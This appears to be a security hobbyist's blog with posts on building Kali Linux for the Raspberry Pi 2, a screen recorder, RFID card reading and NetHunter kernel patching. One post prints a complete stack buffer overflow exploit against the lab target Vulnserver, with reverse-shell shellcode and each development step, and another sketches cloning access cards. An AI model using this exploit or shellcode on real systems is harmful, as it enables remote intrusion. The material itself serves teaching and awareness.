Kali Linux 1.10 on a Pi-2 Update

Hi, this is an update on Kali 1.10 after my last post. It appears Muts(@kalilinux) and the Offensive Security crew have updated their github repo. Within the kali-arm-build-scripts is a new script for the Raspberry Pi-2 called rpi2.sh. The stages to build the image are as follows:-

  • gitclone the offensive security repository
  • put the the kernel image file in the kernel configs directory from here, making sure it is called ‘rpi-3.1.8.config’.
  • run the ‘rpi2/sh. 1.1.10’
  • burn the image to your sdcard

In bash, it goes something like this :-

mkdir arm-stuff
cd arm-stuff
<code>git clone https://github.com/offensive-security/gcc-arm-linux-gnueabihf-4.7
export PATH=${PATH}:/root/arm-stuff/gcc-arm-linux-gnueabihf-4.7/bin</code>
git clone https://github.com/offensive-security/kali-arm-build-scripts
cd kernel-configs
wget https://github.com/yhfudev/arch-kali-rpi2/blob/master/rpi2-3.19.config -O rpi-3.1.8.config
cd ..
./rpi2.sh 1.10
dd bs=4M if=kali-image-name of=/dev/mmcblk0

The good news, is that the image has a patch for wireless injection for the 3.18 kernel and we should not need to copy the /lib/modules across as we have had to in previous builds. The only extra task, I would consider is to copy a config.txt to the boot directory to assign more graphics memory from the XFCE desktop. You can get one here.

Screenshot

desktop

In a further development, I received a comment from comment from YunHui Fu about a script that he has developed which not only builds Kali Linux but also Arch Linux with the wireless patches as well. YunHui github repo is here and you can build it as follows:-


git clone https://github.com/yhfudev/arch-kali-rpi2.git
cd arch-kali-rpi2
./runme.sh

Update

In order to build by YunnHui method, you need to use a Ubuntu host or soething similiar with Glibc > 2.14 otherwise the build will fail, a good choice would be Ubuntu 14.04.

You will need to make sure that you have alll the dependancies sorted, so use the ‘builddeps.sh’ script from the kali arm repository above. Note ‘boot-umakeimage’ is now superseeded by ‘u-boot-tools’ and ia32libs is replaced by a number of packages, these are lib32z1,lib32ncurses5 and lib32bz2-1.0 respectively.

I am currently building Yunn Hui’s build and will post some screen shots on here.

Regards

Cyberkryption

Simple Screen Recorder on Kali Linux

I needed a screen recorder for some upcoming video tutorials that I might put together, but found that normal recorders such as recordmydesktop did not do the job well. After some ‘googling’, I can across Simple Screen Recorder, but there were no packages in the Debian or Kali repo’s. However, the developer’s github page has all that you need here.

The compile it, do the following:-

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install build-essential pkg-config qt4-qmake libqt4-dev libavformat-dev libavcodec-dev libavutil-dev libswscale-dev libasound2-dev libpulse-dev libjack-jackd2-dev libgl1-mesa-dev libglu1-mesa-dev libx11-dev libxfixes-dev libxext-dev libxi-dev g++-multilib libx11-6 libxext6 libxfixes3 libxfixes3:i386 libglu1-mesa:i386
cd /usr/lib/i386-linux-gnu
sudo ln -s libGL.so.1 libGL.so
sudo ln -s libGLU.so.1 libGLU.so
sudo ln -s libX11.so.6 libX11.so
sudo ln -s libXext.so.6 libXext.so
sudo ln -s libXfixes.so.3 libXfixes.so
sudo ldconfig

Now clone the developer’s repo , so that you have a local copy.

git clone https://github.com/MaartenBaert/ssr
cd ssr

If you run in Kali as root (which is considered a bad security practice) then you need to comment out the root check in the install script as shown below:-

ssr

Now simply run the install script..

./simple-build-and-install

Enjoy

Kali-1.1.10 on a Raspberry Pi-2

I’m back and building Kali 1.1.10 for my raspberry Pi-2 with  the kernel from the latest raspbian image at the time of writing, which is 2015-02-16-raspbian-wheezy.img. The video below shows the actual image running, apologies for tint in the video.

The procedure is pretty much the same as per my previous post here, so if you have not read it, please read it first.

The kernel configuration was taken from the above raspbian image and is pastebin’ed here. Simply save it in the kernel configs directory within the kali-arm build system.

Update – 23/02/2015

I would also recommend modify the kernel configuration as per Step 10 here, although I did not do this in my initial build.

Now go ahead and run the rpi.sh script and go get a cup of something as you will have to wait a while..

Now that it is built and you have burned it to your sd card, a word or two about the ‘modules’ problem.

‘Modules’ problem

On my Pi-2, the normal raspbian image has the following modules loaded shown below

pi-modules

Now, if you do the same on your kali image, you will find that no modules are loaded. The upshot of this is that when you try to ‘startx’ everything will freeze. The solution to the problem is shown below:-

  1. mount the raspbian image,
  2. delete the contents of lib/modules directory on your kali image that is burned to your sd card
  3. copy the contents of lib/modules from raspbian image to kali image.

Mounting the raspbian is easy and is shown below:-

mount-raspbian

Now use your favourite graphical file manager to do the rest. The problem is that during the build process, the kernel was patched for wireless injection. Copying the files from the raspbian image breaks this, leaving us with a kernel not patched for injection. In order to resolve this, we patch the running kernel on the Pi-2, recompile and install the kernel.

Kernel Recompilation

The procedure for recompiling the kernel goes like this

sudo apt-get install linux-source
sudo apt-get install bc gcc gcc-4.6 libc-bin libc-dev-bin libc6 libc6-dev linux-libc-dev make manpages-dev
git clone --depth=1 https://github.com/raspberrypi/linux
cd linux
zcat /proc/config.gz > ~/linux/arch/arm/configs/pi_defconfig
mkdir -p ../patches
wget https://raw.github.com/offensive-security/kali-arm-build-scripts/master/patches/kali-wifi-injection-3.12.patch -O ../patches/mac80211.patch
patch -p1 --no-backup-if-mismatch < ../patches/mac80211.patch
make pi_defconfig
make modules
make modules install
sudo cp /boot/kernel.img /boot/kernel-bup.img
sudo cp arch/arm/boot/Image /boot/kernel.img

So now, we havewireless injection working.

 [Optional] – Raspi-Config Package

In order to add the raspi-config package to overclock etc. Simply watch the video and down load the deb packages and install in the correct order.

From the command line, it goes something like this, but I just downloaded them using my browser on the Pi-2.

wget http://archive.raspberrypi.org/debian/pool/main/r/raspi-config/raspi-config_20150131-1_all.deb
wget http://http.us.debian.org/debian/pool/main/l/lua5.1/lua5.1_5.1.5-4+deb7u1_armhf.deb
wget http://http.us.debian.org/debian/pool/main/t/triggerhappy/triggerhappy_0.3.4-2_armhf.deb
dpkg -i triggerhappy_0.3.4-2_armhf.deb
dpkg -i lua5.1_5.1.5-4+deb7u1_armhf.deb
dpkg -i raspi-config_20150131-1_all.deb

Enjoy, That’s all Folks

Exploiting Buffer Overflows

Recently, at the Digital jersey Open Source event, I gave a talk on exploiting a buffer overflow. I used win 7 as a host for the vulnerable Vulnserver application which you can get from the Grey Corner blog here.

The presentation is here, some of the videos are missing. The videos were only a backup if the live demo ran into issues.

         

The final exploit code is shown below, with the steps to achieve it shown afterwards

Final Exploit Code

</pre></pre>
<pre>#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999

prefix = 'A' * 2006
eip = '\xAF\x11\x50\x62'
nopsled = '\x90' * 16

#msfpayload windows/shell_reverse_tcp LHOST=192.168.43.213 LPORT=443 EXITFUNC=thread R | msfencode -b '\x00' -e x86/shikata_ga_nai
exploit = (
"\xbb\x7d\x25\x14\xae\xda\xc0\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x52\x31\x5e\x12\x03\x5e\x12\x83\x93\xd9\xf6\x5b\x97" +
"\xca\x75\xa3\x67\x0b\x1a\x2d\x82\x3a\x1a\x49\xc7\x6d\xaa" +
"\x19\x85\x81\x41\x4f\x3d\x11\x27\x58\x32\x92\x82\xbe\x7d" +
"\x23\xbe\x83\x1c\xa7\xbd\xd7\xfe\x96\x0d\x2a\xff\xdf\x70" +
"\xc7\xad\x88\xff\x7a\x41\xbc\x4a\x47\xea\x8e\x5b\xcf\x0f" +
"\x46\x5d\xfe\x9e\xdc\x04\x20\x21\x30\x3d\x69\x39\x55\x78" +
"\x23\xb2\xad\xf6\xb2\x12\xfc\xf7\x19\x5b\x30\x0a\x63\x9c" +
"\xf7\xf5\x16\xd4\x0b\x8b\x20\x23\x71\x57\xa4\xb7\xd1\x1c" +
"\x1e\x13\xe3\xf1\xf9\xd0\xef\xbe\x8e\xbe\xf3\x41\x42\xb5" +
"\x08\xc9\x65\x19\x99\x89\x41\xbd\xc1\x4a\xeb\xe4\xaf\x3d" +
"\x14\xf6\x0f\xe1\xb0\x7d\xbd\xf6\xc8\xdc\xaa\x3b\xe1\xde" +
"\x2a\x54\x72\xad\x18\xfb\x28\x39\x11\x74\xf7\xbe\x56\xaf" +
"\x4f\x50\xa9\x50\xb0\x79\x6e\x04\xe0\x11\x47\x25\x6b\xe1" +
"\x68\xf0\x3c\xb1\xc6\xab\xfc\x61\xa7\x1b\x95\x6b\x28\x43" +
"\x85\x94\xe2\xec\x2c\x6f\x65\xd3\x19\x44\xa0\xbb\x5b\x9a" +
"\x4b\x87\xd5\x7c\x21\xe7\xb3\xd7\xde\x9e\x99\xa3\x7f\x5e" +
"\x34\xce\x40\xd4\xbb\x2f\x0e\x1d\xb1\x23\xe7\xed\x8c\x19" +
"\xae\xf2\x3a\x35\x2c\x60\xa1\xc5\x3b\x99\x7e\x92\x6c\x6f" +
"\x77\x76\x81\xd6\x21\x64\x58\x8e\x0a\x2c\x87\x73\x94\xad" +
"\x4a\xcf\xb2\xbd\x92\xd0\xfe\xe9\x4a\x87\xa8\x47\x2d\x71" +
"\x1b\x31\xe7\x2e\xf5\xd5\x7e\x1d\xc6\xa3\x7e\x48\xb0\x4b" +
"\xce\x25\x85\x74\xff\xa1\x01\x0d\x1d\x52\xed\xc4\xa5\x72" +
"\x0c\xcc\xd3\x1a\x89\x85\x59\x47\x2a\x70\x9d\x7e\xa9\x70" +
"\x5e\x85\xb1\xf1\x5b\xc1\x75\xea\x11\x5a\x10\x0c\x85\x5b" +
"\x31"
)
brk = '\xcc'
padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
attack = prefix + eip + nopsled + exploit + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending Evil Buffer to TRUN "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
<pre>

 

The stages of code used to achieve remote code execution are shown below.

Code 1 – Initial Crash

</pre>
#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999

length = int(raw_input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending attack length ", length, ' to TRUN .'
attack = 'A' * length
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
<pre>

Code 2 – Cyclic Pattern to locate EIP

</pre>
#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)

print "Sending Evil Buffer to TRUN ."
attack = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
<pre>

Code 3 – Convert.sh used to convert Hex to ASCII

</pre>
TESTDATA=$(echo '0x38.0x43.0x6F.0x39' | tr '.' ' ')
for c in $TESTDATA; do
    echo $c | xxd -r
done
echo ""</pre>
<pre><pre>
Code 4 - Confirm EIP location in Buffer
</pre>
#!/usr/bin/python
import socket
server = '192.168.43.12'
sport = 9999

prefix = 'A' * 2006
eip = 'BBBB'
padding = 'F' * (3000 - 2006 - 4)
attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending Buffer to TRUN  "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

</pre>
<pre><pre>
Code 5 - Confirming JMP ESP
</pre></pre>
<pre>#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999

prefix = 'A' * 2006
eip = '\xAF\x11\x50\x62'
nopsled = '\x90' * 16
brk = '\xcc'
padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
attack = prefix + eip + nopsled + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending Evil Buffer to TRUN "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

</pre>
<pre><pre>
Code 6 - Bad Characters
</pre></pre>
<pre>#!/usr/bin/python
import socket
server = '192.168.43.12'
port = 9999
prefix = 'A' * 2006
eip = '\x42\x42\x42\x42'
nopsled = '\x90' * 16
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
brk = '\xcc'
padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
attack = prefix + eip + nopsled + badchars + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, port))
print s.recv(1024)
print "Sending Evil Buffer to TRUN "
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()

</pre>
<pre><pre>

That’s All Folks….!

Kali Linux on a Raspberry Pi 2

First git clone the kali linux arm repo from https://github.com/offensive-security/kali-arm-build-scripts

Now modify, the architecture in the rpi.sh script to read “armhf” rather “armel” as the Raspberry Pi 2 has a different processor architecture

rpi-mod1

Create our kernel configuration by copying the one that is pastebin’d here

Save the file as “rpi-3.1.8.config” in the kernel config directory.

Modify  the rpi.sh script to use our new kernel configuration.

rpi-mod2

Now run the rpi.sh command, if all goes well, you should see something like below.

kali-complete

14/02/2015 Update

You will probably encounter a problem with ‘startx’ command freezing the ‘X’ environment with the build. If this is the case, then look at the kali linux forum post here.

The solution is essentially to copy the /lib/modules directory from the Raspbian image. I will look at modifying the build script to solve this in the near future.

RFID Tastic POC

Recently, whilst waiting for my rfidler to turn up, I found the Bishop’s Fox site with the RFID Tastic on here. As I don’t have the cash to spring for the HID MaxiProx 5375AGN00 reader required for building it, I decided to see if I could built it with a normal HID R10 mullion reader as a proof of concept. However, I needed to 12v to power the reader so I changed the R1 and R2 resistors to 390 Ohm and 3300 ohm respectively. The R10 mullion reader supports the Wiegland protocol out of the box, so no changes we need to accommodate it. Below is a screenshot of it working on the bench reading a crd and storing the card data on the SD card.

cloner-scaled

After that it was installed in a protective case as shown in preparation for the Jersey Tech Fair.  The unit was demoed reading Mifare access cards , jersey bus pre- ayment cards as well as NFC enabled bank cards in order to raise awareness.

cloner2-scaled

As you can get programmable UID0 cards on Ebay for a little as $2, it is easy to imagine the type of access that could be obtained when coupled to the high powered HID Maxprox 5375AGN00 reader which would enable reading of cards at distance. For example, a buildings access control cards could be read by just walking past employees as they enter, this data can then be reprogrammed on a UID0 card which would potentially allow unauthorised personnel access to buildings.

 

The Quest for Kali Nethunter – Part 3

In this third post, we shall look at the patching of the kernel sources for cm-11.

The kernel sources is located at /root/android/system/kernel// which in my case is root/android/system/kernel/htc/endeavoru.

Next we change to kernel source tree root location and get patches from the following

wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch

Now, we patch it.

patch1-kernel

Now we download the kernel patch from pelya repository at https://github.com/pelya/android-keyboard-gadget/blob/master/kernel-3.1.patch

Next we patch it as shown below:-

patch2-kernel

As we can see the patching worked apart from android.c in drivers/usb/gadget . Upon looking at the code, it became clear that it could be manually patched in android.c at line 1704 as shown below:-

patch3-kernel

Now that we have patched the kernel, we need to apply the eventdrc patch in /root/android/system/system/core/rootdir as shown below:-

patch-uevent

Now head to the android/system and type ‘make clean’ to clean the build system. Now rebuilt the rom, as per the previous posts.